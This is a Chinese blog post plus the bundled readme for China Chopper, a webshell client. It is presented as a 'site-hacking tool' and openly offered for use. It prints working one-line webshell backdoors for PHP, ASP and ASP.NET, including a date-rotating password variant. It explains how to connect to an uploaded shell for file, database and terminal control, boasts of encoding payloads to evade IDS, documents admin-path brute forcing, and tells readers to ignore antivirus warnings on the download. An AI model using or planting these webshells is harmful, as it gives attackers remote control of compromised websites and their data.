黑站利器-中國菜刀的功能介紹和使用方法
中國菜刀,一個非常好用而又強大的webshell,它可不是用來切菜的做飯的道具哦,是一款專業的網站管理軟件,大小隻有300多KB,真是小巧實用啊!不過被不法分子利用到,就是一個黑站的利器了。我記得以前接觸的時候摸索了好久纔會用,哈哈。。後來領悟之後才發現並不難操作,同時功能也比我想象的要強大。
http://pan.baidu.com/s/1i3ojJe9
1.中國菜刀支持的服務端腳本:PHP、ASP;
2.主要功能有:文件管理(有足夠的權限時候可以管理整個磁盤/文件系統),數據庫管理,虛擬終端。
3.菜刀的工作原理是:利用上傳到服務器的一句話腳本再通過一些添加配置就可以工作了。
今天我只介紹PHP的方法(其他的大同小異)。
首先:我們首先要新建一個php文件,文件名隨意取,然後寫入一句代碼:<?php eval($_POST['ee']); ?> ;eval()這個函數大家並不陌生吧,就是把裏面的字符串作爲PHP代碼執行。最後把這個文件保存,上傳到你站點裏面,可以是根目錄,也可以是其他,都行的。如下圖:
第二步:打開菜刀這個軟件,進入如下界面,右鍵點擊“添加”;如下圖:
第三步:此時會彈出一個添加shell的對話框,由圖一看出我的 “dxr.php”上傳在站點根目錄,所以這裏的地址填爲:http://localhost/dxr.php 。地址後面的小框框裏面的“ee”就是你的“口令”,也就是<?php eval($_POST['ee']); ?> 這裏的“ee”。下面配置項如果你知道用戶名密碼就填,不知道,不填,也不會影響文件管理和虛擬終端這兩個功能,只是不能查看數據庫了。
最後:點擊“添加”按鈕,成功後就會產生一條新的記錄,鼠標右鍵點擊就可以進行操作了,如下圖,可以進行文件管理,數據庫管理,虛擬終端。哈哈...大功告成!!
所以很多黑站者利用一些網站漏洞,上傳一句話***後,就基本上可以黑下你的站了。中國菜刀,就是這麼強大!!
操作效果截圖一:
操作效果截圖二:
操作效果截圖三:
菜刀下載:http://pan.baidu.com/s/1i3ojJe9
終於寫完了,喜歡的話就支持一下哦,代瀟瑞博客,專注於PHP學習!!
最後說明一下:此軟件打開時殺毒軟件可能會報毒的,我已經用了很多遍,反正都沒事。如果你不相信的話,也就不用下載了,呵呵。
本站文章除了註明出處外,其他皆爲作者原創文章,可自由引用,但請以鏈接形式標明本站或本文地址。 版權所有,禁止全文轉載。
軟件名稱:中國菜刀(China chopper)
----------------------------------------------------------------------------------------------------------
免責申明:
請使用者注意使用環境並遵守國家相關法律法規!
由於使用不當造成的後果本廠家不承擔任何責任!
----------------------------------------------------------------------------------------------------------
程序在使用過程中難免有各種BUG,到官網看一下是否有更新吧,說不定己經修補了呢。
----------------------------------------------------------------------------------------------------------
UINCODE方式編譯,支持多國語言輸入顯示。
在非簡體中文環境下使用,自動更換成英文界面,翻譯有誤的地方請留言指正。
一、腳本客戶端(包括但不限於EVAL)部分
1)基本信息
Eval服務端只需要簡單的一行代碼,即可用此程序實現常用的管理功能,功能代碼二次編碼後發送,過IDS的能力大幅提高。
目前支持的服務端腳本:PHP, ASP, ASP.NET,並且支持https安全連接的網站。
在服務端運行的代碼如下:
PHP: <?php @eval($_POST['chopper']);?>
ASP: <%eval request("chopper")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
(注意: ASP.NET要單獨一個文件或此文件也是Jscript腳本)
Customize: 自定義類型,功能代碼在服務端保存,理論上支持所有動態腳本,只要正確與菜刀進行交互即可。
此模式可按需定製,比如只要瀏覽目錄,或是隻要虛擬終端功能,代碼可以很簡短。
隨日期變化的連接密碼, 服務端寫法:
Asp.NET:
<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>
PHP:
@eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]);
例如:菜刀的密碼爲chopper,在前面加三個字符,新密碼爲:{D}chopper
2)幾大功能
在主視圖中右鍵/添加,在彈出的對話框中輸入服務端地址,連接的密碼(請注意上例中的pass字串),選擇正確的腳本類型和語言編碼,
保存後即可使用文件管理,虛擬終端,數據庫管理,自寫腳本幾大塊功能。
1. 文件管理:[特色]緩存下載目錄,並支持離線查看緩存目錄;
2. 虛擬終端:[特色]人性化的設計,操作方便;(輸入HELP查看更多用法), 超長命令會分割爲5k字節一份,分別提交。
3. 數據庫管理:[特色]圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式連接的數據庫。
如果精通SQL語法,何必還要PHPMYADMIN呢?而且,菜刀還支持任何腳本的數據庫管理呢。
(各種腳本條件下的數據庫連接方法請點擊數據庫管理界面左上角處的配置按鈕查看)
4. 自寫腳本:通過簡單編碼後提交用戶自己的腳本到服務端執行,實現豐富的功能,也可選擇發送到瀏覽器執行。
如果要寫自己的CCC腳本,可以參考一下CCC目錄下的示例代碼, 相信你也可以寫出功能豐富的腳本。
可以在官網下載別人的CCC腳本,或分享你的得意之作。
注意:由於服務器的安全設置,某些功能可能不能正常使用。
3) 配置信息填寫說明
---------------------------------------------------------------------------------------
A) 數據庫方面:
-----------------------------------------------------------------------------
PHP腳本:
<T>類型</T> 類型可爲MYSQL,MSSQL,ORACLE,INFOMIX中的一種
<H>主機地址<H> 主機地址可爲機器名或IP地址,如localhost
<U>數據庫用戶</U> 連接數據庫的用戶名,如root
<P>數據庫密碼</P> 連接數據庫的密碼,如123455
<L>utf8</L> 這一項數據庫類型爲MYSQL腳本爲PHP時可選,不填則爲latin1
ASP和ASP.NET腳本:
<T>類型</T> 類型只能填ADO
<C>ADO配置信息</C>
ADO連接各種數據庫的方式不一樣。如MSSQL的配置信息爲
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
同時,支持NT驗證登錄MSSQL數據庫,並能把查詢的結果列表導出爲html文件
Customize 腳本:
<T>類型</T> 類型只能填XDB
<X>與Customize 腳本約定的配置信息</X>
菜刀自帶的Customize.jsp數據庫參數填寫方法如下(兩行):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
</X>
MYSQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/[email protected]:1521/test
</X>
B) 其它方面:
-----------------------------------------------------------------------------
添加額外附加提交的數據,如ASP的新服務端是這樣的:
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SC"))
o.run "ff",Server,Response,Request,Application,Session,Error
%>
那麼,菜刀在配置處填入:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
然後以密碼pass來連接即可。
提交功能前先POST額外的數據包:會話期間只提交一次。
<POST>https://site.com/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>
默認終端程序路徑設置示例:
<SHELL>/bin/sh</SHELL>
虛擬終端默認命令設置示例:
<CMD>whoami</CMD>
文件管理默認打開的目錄設置示例:
<CD>c:\windows\temp\</CD>
3) HTTP登錄驗證
SHELL地址這樣填 http://user:[email protected]/server.asp
用戶名密碼中的特殊字符可用URL編碼轉換。
4) 數據導入:在SHELL列表界面,右鍵有一項菜單,可以把其它的菜刀庫導入到當前分類中。
二、安全掃描
蜘蛛爬行,綁定域名查詢,目錄爆破。
命令解釋:
A) 查單一IP的綁定域名
{reverse_ip} {url:http://www.site.com/}
B) 掃描本C段開放的WEB服務器,並查詢綁定域名
{reverse_ip_c} {url:http://www.site.com/}
C) 只掃描本C段開放的WEB服務器
{reverse_ip_c} {url:http://www.site.com/} {port}
{reverse_ip_c} {url:http://www.site.com/} {port}
D) 蜘蛛爬行
{spider} {url:http://www.site.com/}
E) 蜘蛛爬行,並設定爬行範圍
{spider} {url:http://www.site.com/} {range:site.com}
F) 蜘蛛爬行,過濾重複URL加快速度
加上 {filter}
G) 爆破功能,%s爲dict中的一行
flag:後面爲返回的數據(含HTTP頭部)中的特定關鍵字
加!!爲不包含關鍵字爲TRUE,否則包含關鍵字爲TRUE
list.txt爲當前目錄下的文件,可設爲絕對路徑,注意:不要包含太多的行。
注:從20100626版開始,list.txt一定要是UNICODE格式的文本文件
{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
{crack} {url:http://www.site.com/%s/} {flag:successfully} {dict:list.txt}
三、定時提醒
當鬧鐘來用吧, 週期:每月/每週/每日/只一次。
四、快速啓動
一些常用的快捷方式放在這裏,可以指定用戶身份運行程序。這部分數據是加密存儲的。
五、瀏覽器
就是一個專用的網頁瀏覽器:Post瀏覽/自定義Cookies,/執行自定義腳本/自動刷新頁面/同IP網頁搜索。
如果有ip.dat庫,在狀態欄會顯示此網站的IP,國家代碼。
六、其它部分
等待加入。
菜刀網盤下載:http://pan.baidu.com/s/1i3ojJe9